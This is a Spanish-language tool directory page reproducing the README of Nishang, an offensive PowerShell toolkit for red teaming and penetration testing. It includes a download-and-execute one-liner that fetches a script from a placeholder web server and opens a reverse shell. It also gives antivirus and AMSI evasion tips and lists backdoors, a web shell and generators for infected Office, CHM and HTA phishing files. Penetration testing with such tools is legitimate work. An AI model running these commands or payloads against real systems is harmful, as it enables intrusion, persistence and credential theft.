Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
nishang — Nishang - PowerShell ofensivo para equipo rojo, pruebas de penetración y seguridad ofensiva. | Kitploit
Herramientas/GitHubGitHub/samratashok/nishang
Descifrado de ContraseñasHerramientas de PhishingEscalada de PrivilegiosGeneración de PayloadsExplotaciónMovimiento LateralExfiltración de DatosRecopilación de InformaciónPost-ExplotaciónPruebas de PenetraciónComando y Control
10.0k2.5k127hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Red Teaming
GitHubsamratashok/nishang

nishang

Nishang - PowerShell ofensivo para equipo rojo, pruebas de penetración y seguridad ofensiva.

Ver Repositorio

Nishang

Nishang es un conjunto de scripts y payloads que permite el uso de PowerShell para seguridad ofensiva, pruebas de penetración y red teaming. Nishang es útil durante todas las fases de las pruebas de penetración.

Por Nikhil Mittal Fundador de Altered Security - ¡Formación práctica en red team y seguridad empresarial!

Uso

Importa todos los scripts en la sesión actual de PowerShell (PowerShell v3 en adelante).

PS C:\nishang> Import-Module .\nishang.psm1

Usa los scripts individuales con dot sourcing.

PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

Para obtener ayuda sobre cualquier script o función, usa:

PS C:\nishang> Get-Help [scriptname] -full

Nota: desde la versión 0.3.8, la ayuda está disponible para la función cargada después de ejecutar el script, no para el script en sí. En todos los casos, el nombre de la función es el mismo que el del script.

Por ejemplo, para ver la ayuda sobre Get-WLAN-Keys.ps1, usa

PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

Anti Virus

Los scripts de Nishang son marcados como maliciosos por muchos antivirus. Los scripts en un objetivo deben ejecutarse en memoria, algo muy fácil de hacer con PowerShell. Dos métodos básicos para ejecutar scripts de PowerShell en memoria:

Método 1. Usa la descarga y ejecución en memoria: Usa el siguiente comando para ejecutar un script de PowerShell desde un shell remoto, un shell nativo de meterpreter, una web shell, etc., y la función que exporta. Todos los scripts de Nishang exportan una función con el mismo nombre en la sesión actual de PowerShell.

powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

Método 2. Usa el parámetro -encodedcommand (o -e) de PowerShell Todos los scripts de Nishang exportan una función con el mismo nombre en la sesión actual de PowerShell. Por lo tanto, asegúrate de que la llamada a la función se realiza en el propio script al usar el parámetro encodedcommand desde un shell que no sea PowerShell. Para el ejemplo anterior, añade una llamada a la función (sin comillas) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".

Codifica el script usando Invoke-Encode de Nishang:

PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand

Datos codificados escritos en .\encoded.txt Comando codificado escrito en .\encodedcommand.txt

A partir de lo anterior, usa el script codificado de encodedcommand.txt y ejecútalo en un objetivo donde se puedan ejecutar comandos (un shell remoto, un shell nativo de meterpreter, una web shell, etc.). Úsalo de la siguiente manera:

C:\Users\target> powershell -e [encodedscript]

Si los scripts aún son detectados, cambiar los nombres de funciones y parámetros y eliminar el contenido de ayuda puede ayudar.

En caso de que AMSI de Windows 10 aún bloquee la ejecución del script, consulta este blog: http://www.labofapenetrationtester.com/2016/09/amsi.html

Scripts

Nishang actualmente contiene los siguientes scripts y payloads.

ActiveDirectory

Set-DCShadowPermissions

Modifica objetos de AD para proporcionar los permisos mínimos requeridos para DCShadow.

Antak - la Web Shell

Antak

Ejecuta scripts de PowerShell en memoria, ejecuta comandos, y descarga y sube archivos usando esta web shell.

Puertas traseras

HTTP-Backdoor

Una puerta trasera que puede recibir instrucciones de sitios web de terceros y ejecutar scripts de PowerShell en memoria.

DNS_TXT_Pwnage

Una puerta trasera que puede recibir comandos y scripts de PowerShell desde consultas DNS TXT, ejecutarlos en un objetivo, y ser controlada remotamente mediante consultas.

Execute-OnTime

Una puerta trasera que puede ejecutar scripts de PowerShell en un momento específico en un objetivo.

Gupt-Backdoor

Una puerta trasera que puede recibir comandos y scripts desde un SSID de WLAN sin conectarse a él.

Add-ScrnSaveBackdoor

Una puerta trasera que puede usar el protector de pantalla de Windows para ejecución remota de comandos y scripts.

Invoke-ADSBackdoor

Una puerta trasera que puede usar flujos de datos alternativos y el Registro de Windows para lograr persistencia.

Add-RegBackdoor

Una puerta trasera que usa el conocido truco del depurador para ejecutar payloads con Sticky keys y Utilman (Tecla Windows + U).

Set-RemoteWMI

Modifica permisos de DCOM y espacios de nombres WMI para permitir acceso a un usuario no administrador.

Set-RemotePSRemoting

Modifica permisos de la comunicación remota de PowerShell para permitir acceso a un usuario no administrador.

Bypass

Invoke-AmsiBypass

Implementación de métodos conocidos públicamente para evitar/eludir AMSI.

Cliente

Out-CHM

Crea archivos CHM infectados que pueden ejecutar comandos y scripts de PowerShell.

Out-Word

Crea archivos de Word e infecta los existentes para ejecutar comandos y scripts de PowerShell.

Out-Excel

Crea archivos de Excel e infecta los existentes para ejecutar comandos y scripts de PowerShell.

Out-HTA

Crea un archivo HTA que puede desplegarse en un servidor web y usarse en campañas de phishing.

Out-Java

Crea archivos JAR firmados que pueden usarse con applets para la ejecución de scripts y comandos.

Out-Shortcut

Crea archivos de acceso directo capaces de ejecutar comandos y scripts de PowerShell.

Out-WebQuery

Crea archivos IQY para phishing de credenciales y hashes SMB.

Out-JS

Crea archivos JS capaces de ejecutar comandos y scripts de PowerShell.

Out-SCT

Crea archivos SCT capaces de ejecutar comandos y scripts de PowerShell.

Out-SCF

Crea un archivo SCF que puede usarse para capturar desafíos de hash NTLM.

Escalación

Enable-DuplicateToken

Cuando se requieren privilegios SYSTEM.

Descargar herramienta